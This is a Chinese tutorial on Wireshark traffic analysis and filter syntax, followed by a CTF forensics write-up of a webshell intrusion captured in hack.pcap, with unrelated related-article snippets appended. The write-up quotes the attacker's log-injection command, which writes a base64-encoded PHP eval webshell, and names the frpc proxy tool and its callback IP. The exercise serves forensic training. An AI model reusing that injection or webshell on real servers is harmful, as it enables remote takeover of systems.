流量分析基础

定义:

  流量分析(Traffic Analysis)是指对网络流量数据进行分析和解释,以获得有关网络中通信的信息和情报。这种技术可以用于网络安全、网络管理和网络优化等领域。

  网络流量包含了许多有关网络通信的细节信息,如源IP地址、目标IP地址、端口号、协议类型、数据包大小、传输速率等等。通过对这些信息进行分析和解释,可以获得对网络通信的深入理解,并发现潜在的问题和威胁。需要了解网络协议、数据包分析、安全攻防技术等相关知识。此外,还需要使用专业的流量分析工具,如Wireshark、tcpdump、Snort等等,以捕获和分析网络流量数据。在网络安全领域,流量分析被广泛应用于入侵检测、网络监控、漏洞分析等方面。例如,通过对网络流量进行分析和解释,可以发现恶意软件、网络钓鱼攻击、DDoS攻击等各种网络威胁,并采取相应的防御措施。

  wireshark:

一、Wireshark简介

Wireshark是一款世界范围最广、最好用的网络封包分析软件,功能强大,界面友好直观,操作起来非常方便。它的创始人是Gerald Combs,前身是Ethereal,作为开源项目经过众多开发者的完善它已经成为使用量最大的安全工具之一。在CTF中也经常会使用wireshark进行流量数据包分析,可以快速检测网络通讯数据,获取最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。用户将在图形界面中浏览这些数据,实时监控TCP、session等网络动态,轻松完成网络管理操作。其对pcap包分析过程中常用的功能基本上包括:数据包筛选、数据包搜索、流还原、流量提取等

二、安装与使用

去官网下载,按照相应指示安装即可,

Wireshark支持的网络类型:

InterfaceLinuxmacOSWindows
蓝牙
以太网
USB
无线局域网
PPP链路

打开后点击所需网关即可抓包

它提供了三个主要面板,包括:

  1. 抓包面板(Capture Panel):抓包面板用于捕获网络数据包,并显示已经捕获的数据包列表。在该面板中,可以选择捕获的网络接口、设置捕获过滤器、启动和停止抓包等操作。此外,还可以通过右键单击数据包,查看详细信息、导出数据包、跟踪TCP流等。

  2. 数据包列表面板(Packet List Panel):数据包列表面板显示已经捕获的数据包列表,其中每个数据包占据一行,并列出了有关该数据包的一些关键信息,如时间戳、源IP地址、目标IP地址、协议类型、数据包长度等。此外,还可以通过对列表进行排序、筛选、搜索等操作,方便用户查找和分析数据包。

  3. 数据包详情面板(Packet Detail Panel):数据包详情面板显示选定数据包的详细信息,包括各个协议层的数据结构和字段值。用户可以通过展开不同的节点,查看不同的协议头和数据负载,帮助用户深入理解数据包的内容和意义。

常用语法:

(在搜索框输入http即可看http的流量)

tcp:显示所有TCP协议的数据包
udp:显示所有UDP协议的数据包
http:显示所有HTTP协议的数据包
dns:显示所有DNS协议的数据包
icmp:显示所有ICMP协议的数据包

ip地址筛选:

ip.addr == 192.168.0.1:显示与指定IP地址相关的所有数据包
ip.src == 192.168.0.1 :显示源IP地址为指定地址的数据包
ip.dst == 192.168.0.2:显示目标IP地址为指定地址的数据包

端口筛选:

tcp.port ==  80:显示使用指定TCP端口的数据包
udp.port == 53:显示使用指定UDP端口的数据包

比较运算符:

==:等于,例如:http.request.method == "POST"
!=:不等于,例如:ip.addr != 192.168.0.1
<、>:小于、大于,例如:frame.len > 100 或 frame.len < 50,可以指定过滤数据包长度

数据包内容过滤规则:

http.request.method == "GET" 或 tcp.flags.syn == 1,可以通过指定数据包内容,只保留符合条件的数据包。

# 在TCP三次握手过程中,客户端向服务端发送一个SYN标志的数据包,表示请求建立连接。而tcp.flags.syn == 1就是Wireshark中用于匹配TCP SYN标志的过滤规则,其中1表示该标志位被置为1,表示该数据包是一个SYN数据包。当Wireshark捕获到一个TCP数据包时,会检查该数据包的TCP头部中的SYN标志位是否被置为1,如果符合条件,则该数据包会被匹配并显示出来。这样,用户就可以快速过滤出所有的TCP SYN数据包,方便进行相关的分析和处理。

复杂筛选:

ip.src == 192.168.0.1 and tcp.port == 80

这个表达式的作用是:选择源IP地址为192.168.0.1并且目标TCP端口为80的网络流量。这样可以过滤出与指定源IP地址和目标端口相关的流量,以便进一步分析和观察与该目标端口的通信相关的数据包。

解释每个部分的含义:

  • ip.src == 192.168.0.1:选择源IP地址为192.168.0.1的网络流量。
  • tcp.port == 80:选择目标TCP端口为80的网络流量。

通过组合这些条件,可以有效地过滤出特定源IP地址和目标端口的网络流量

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http.request.method==POST 

这个表达式的作用是:选择源IP地址为192.168.1.8或202.1.1.2,并且HTTP请求方法为POST的网络流量。这样可以过滤出满足这两个条件的网络流量,以便进一步分析和观察与POST请求相关的数据包。

解释每个部分的含义:

  • ip.addr == 192.168.1.8:选择源IP地址为192.168.1.8的网络流量。
  • ip.addr == 202.1.1.2:选择源IP地址为202.1.1.2的网络流量。
  • http.request.method==POST:选择HTTP请求方法为POST的网络流量。

蓝牙协议为obex协议

以下是一些用于匹配HTTP流量中的特定内容的语法:

  1. http.host == "www.example.com":匹配目标主机为"www.example.com"的HTTP请求和响应。

  2. http contains "login":用于匹配HTTP流量中包含"login"字符串的数据包。

  3. http.request.method == "POST":匹配使用HTTP POST方法发送请求的数据包。

  4. http.response.code == 200:匹配状态码为200的HTTP响应数据包。

  5. http.cookie contains "sessionid":匹配包含名为"sessionid"的HTTP Cookie数据包。

  6. http.content_type == "text/html":匹配Content-Type头部为"text/html"的HTTP数据包。

  7. http.request.uri contains "admin":匹配包含"admin"字符串的HTTP请求URI。

  8. http.request.uri matches ".*\.(jpg|png|gif)":匹配HTTP请求URI中以".jpg"、".png"或".gif"结尾的URI。

  9. http.user_agent matches "Mozilla.*":匹配User-Agent头部以"Mozilla"开头的HTTP请求数据包。

题目[陇剑杯2021webshell]:

1.分析数据包hack.pcap,黑客登录系统使用的密码是________。
2.分析数据包hack.pcap,黑客修改了一个文件日志,文件的绝对路径为________。
3.分析数据包hack.pcap,黑客获取webshell之后,权限是_________?
4.分析数据包hack.pcap,黑客写入的webshell文件名是_________。
5.分析数据包hack.pcap,黑客上传的代理工具客户端名字是__________。
6.分析数据包hack.pcap,黑客代理工具的回连服务端IP是___________。

 1、分析登录系统使用的密码

过滤语法:

http contains "login"

点击长度753那条,拉到下面看到使用的密码为:Admin123!@#

2、分析文件的绝对路径

因为题目中黑客修改了日志,所以直接搜.log

http contains ".log"

我们翻最大长度的且非404的包能看见日志路径和命令执行,不过这不是绝对路径,继续追踪http流(右击数据-->追踪流-->追踪http流)

重点在于:

 variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > /var/www/html/1.php');HTTP/1.1 200 OK

 拼接一下能得出文件的绝对路径是:/var/www/html/data/Runtime/Logs/Home/21_08_07.log

3、分析黑客获取webshell后的权限

搜索:

http contains "whoami"

出来的两条数据虽然有whoami但是没有权限,我们追踪http流,然后在里面搜索default(即默认权限)

[ 2021-08-07T17:37:59+08:00 ] 172.17.0.1 /index.php?m=home&a=assign_resume_tpl

ERR: ...............:./Application/Home/View/default/www-data

 权限是www-data

4、分析黑客写入的webshell文件名

第二题就能看见写入的是1.php


5.分析黑客上传的代理工具客户端名字

由上题可知webshell的连接密码是aaa,直接搜索aaa,然后追踪http流

翻到后面得到:

 

ThinkPHP/ 2021-08-07 05:59:50 4096 0777

Application/ 2021-08-07 05:59:49 4096 0777

data/ 2021-08-07 06:00:32 4096 0777

frpc 2021-08-07 09:42:32 9973760 0644

index.php 2021-08-07 05:59:50 2269 0777

1.php 2021-08-07 09:39:54 29 0644

favicon.ico 2021-08-07 05:59:50 1150 0777

install.php 2021-08-07 05:59:50 378 0777

frpc.ini 2021-08-07 09:42:17 240 0644

代理工具客户端名字是:frpc

6.分析代理工具的回连服务端IP

  黑客通过代理客户端写入文件并上传,在文件上传请求的包中,数据以16进制的形式呈现(因为在传输过程中,数据通常以二进制形式进行编码,可以通过将二进制数据转换为16进制来进行可视化展示和分析)

我们可以使用Burpsuite进行16进制转换,将抓取到的16进制数据复制到Burpsuite中。在Burpsuite中,找到并点击顶部菜单栏"Decoder"选项卡,在Decoder工具的界面上,选择"ASCII hex"选项(意味将16进制数据转换为ASCII字符串),然后点击"Decode"按钮。Burpsuite将会将16进制数据转换为相应的ASCII字符串。

代理工具的回连客户端IP是:192.168.239.123

相关参考:

Wireshark 的抓包和分析,看这篇就够了!_wireshark抓包数据怎么看-CSDN博客

CTF——流量分析题型整理总结_ctf流量分析-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/228165.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux c++开发-06-使用Linux API 进行文件的读写

先简单的介绍一下open,read,write 先用open接口去打开文件&#xff0c;flag表示打开文件的权限不同。 int open(const char *pathname, int flags); int open(const char *pathname, int flags, mode_t mode);示例 结果&#xff1a;

经典深度学习算法【1】:K-近邻算法(KNN)概述

最简单最初级的分类器是将全部的训练数据所对应的类别都记录下来&#xff0c;当测试对象的属性和某个训练对象的属性完全匹配时&#xff0c;便可以对其进行分类。但是怎么可能所有测试对象都会找到与之完全匹配的训练对象呢&#xff0c;其次就是存在一个测试对象同时与多个训练…

迭代器的分类

迭代器的分类&#xff1a; 这里的前置后置递增是a和a&#xff1b; 这里的前值后置递减是a--和--a&#xff1b; 各迭代器的继承关系&#xff1a; 当使用双向迭代器时&#xff0c;可以使用随机迭代器&#xff1b;

THEMIS---Beta Sprint Summary Essay Blog

Which course does this assignment belong to2301-MUSE社区-CSDN社区云What are the requirements for this assignmentbeta SprintThe goal of this assignmentTo summarize the beta task progress and the teams sprintsTeam NameThemisTop-of-the-line collection of essa…

maui中实现加载更多 RefreshView跟ListView 跳转到详情页 传参(3)

效果如图 这里的很多数据是通过传参过来的的。 代码 例表页加入跳转功能&#xff1a; <ListView ItemsSource"{Binding Items}" ItemAppearing"OnItemAppearing" ItemTapped"OnItemTapped" RowHeight"70" Margin"20"…

visual studio 2019 移除/卸载项目已经如何再加载项目

文章目录 移除解决方案下的某个项目添加已移除的项目移除项目加载已卸载的项目注意事项 移除解决方案下的某个项目 在项目名称上&#xff0c;点击鼠标右键&#xff0c;弹出右键工具栏&#xff0c;找到 移除 功能。 然后鼠标左键点击 移除。 弹出的模态框&#xff0c;选择确定…

代码随想录刷题题Day15

刷题的第十五天&#xff0c;希望自己能够不断坚持下去&#xff0c;迎来蜕变。&#x1f600;&#x1f600;&#x1f600; 刷题语言&#xff1a;C Day15 任务 ● 513.找树左下角的值 ● 112. 路径总和 113.路径总和ii ● 106.从中序与后序遍历序列构造二叉树 105.从前序与中序遍历…

MYSQL备份和恢复

数据库的备份和恢复&#xff1a; 备份&#xff1a;完全备份 增量备份 完全备份&#xff1a;将整个数据库完整的进行备份 增量备份&#xff1a;在完全备份的基础之上&#xff0c;对后续新增的内容进行备份 备份的需求&#xff1a; 在生产环境中&#xff0c;数据的安全至关重…

Docker安装Redis哨兵

目录 Redis哨兵 一、哨兵模式的主要概念和组件 二、哨兵模式的工作流程 三、哨兵配置流程 1、创建Redis哨兵配置文件 2、启动哨兵 3、命令解读 4、 查看哨兵是否正常启动 5、测试主机宕机 四、哨兵运行流程 五、哨兵选举算法 六、哨兵使用建议 Redis哨兵 Redis哨兵…

josef约瑟 时间继电器 DS-23/C AC220V 10S柜内板前接线

系列型号&#xff1a; DS-21时间继电器 &#xff1b;DS-22时间继电器&#xff1b; DS-23时间继电器&#xff1b;DS-24时间继电器&#xff1b; DS-21C时间继电器&#xff1b;DS-22C时间继电器&#xff1b; DS-23C时间继电器&#xff1b; DS-25时间继电器&#xff1b;DS-26…

python/c++ Leetcode题解——746. 使用最小花费爬楼梯

目录 方法一&#xff1a;动态规划 复杂度分析 方法一&#xff1a;动态规划 假设数组 cost 的长度为 n&#xff0c;则 n 个阶梯分别对应下标 0 到 n−1&#xff0c;楼层顶部对应下标 n&#xff0c;问题等价于计算达到下标 n 的最小花费。可以通过动态规划求解。 创建长度为 n…

孩子都能学会的FPGA:第三十三课——用FPGA实现一个通用的SPI主机接收模块

&#xff08;原创声明&#xff1a;该文是作者的原创&#xff0c;面向对象是FPGA入门者&#xff0c;后续会有进阶的高级教程。宗旨是让每个想做FPGA的人轻松入门&#xff0c;作者不光让大家知其然&#xff0c;还要让大家知其所以然&#xff01;每个工程作者都搭建了全自动化的仿…

如何从 iPhone 上恢复已删除的照片教程分享

您是否错误地删除了 iPhone 上的错误照片&#xff1f;或者您可能已将手机恢复出厂设置&#xff0c;但现在所有照片都消失了&#xff1f;如果您现在遇到这样的情况&#xff0c;我们可以为您提供解决方案。 在本文中&#xff0c;我们将向您展示七种数据恢复方法&#xff0c;可以…

论文解读 | NeurIPS2023:「解释一切」图像概念解释器

点击蓝字 关注我们 AI TIME欢迎每一位AI爱好者的加入&#xff01; 讲者简介 孙奥&#xff1a; 香港科技大学软件安全实验室在读博士&#xff0c;研究兴趣为可解释性人工智能和可信机器学习&#xff0c;主要是从Post-hoc&#xff0c;逻辑和概念的角度分析神经网络的机理 Title 「…

服务器安全的威胁和防范

由于服务器发挥着至关重要的作用&#xff0c;因此存储在服务器上的机密数据和信息非常具有价值。做好服务器安全至关重要。 常见的服务器安全隐患包括&#xff1a; 1.恶意的攻击&#xff1a;遭受CC攻击和DDoS攻击&#xff0c;导致游戏或是网站打不开&#xff0c;严重影响业务…

【智能算法】11种混沌映射算法+2种智能算法示范【鲸鱼WOA、灰狼GWO算法】

目录 1 主要内容 2 部分代码 3 程序结果 4 下载链接 1 主要内容 混沌映射算法是我们在智能算法改进中常用到的方法&#xff0c;本程序充分考虑改进算法应用的便捷性&#xff0c;集成了11种混合映射算法&#xff0c;包括Singer、tent、Logistic、Cubic、chebyshev、Piecewise…

华为面试题,连续出了三年!

写在前面 据说&#xff0c;这是一道被华为 2021、2022 和 2023 都出过的题目 &#x1f923; 华为是「卷」的发明者&#xff0c;但不是「内卷」发明者&#xff0c;毕竟只有华为是实打实的给加班费。 这么卷的公司&#xff0c;怎么也不更新一下题库。 难道没人做出来就不用考虑换…

2023-12-17 AIGC-AnimateDiff详细安装和使用教程

AnimateDiff专用模型下载 AnimateDiff有其自身专门的运动模型mm_sd_v15_v2.ckpt 和 专属的镜头运动lora,需要放置在对应的位置。 stablediffusion位置: 运动模型放在stable-diffusion-webui\extensions\sd-webui-animatediff\model里面 运动lora放在stable-diffusion-web…

Quartus 18.1软件及支持包安装教程

安装前最好关闭电脑的杀毒软件和防火墙 安装包可以到Quartus官网下载需要的版本&#xff0c;注意选择操作系统 Quartus官网&#xff1a;FPGA 设计软件 - 英特尔 Quartus Prime (intel.cn) 下载解压后以管理员的身份运行 QuartusSetup-18.1.0.625.exe文件&#xff0c;版本不同…

中国剩余定理CRT

文章目录 作用证明AcWing 204. 表达整数的奇怪方式CODE 作用 用于求模数两两互质的线性同余方程组&#xff0c;若不互质则不存在解。 《孙子算经》中有这样一个问题&#xff1a;“今有物不知其数&#xff0c;三三数之剩二&#xff0c;五五数之剩三&#xff0c;七七数之剩二&am…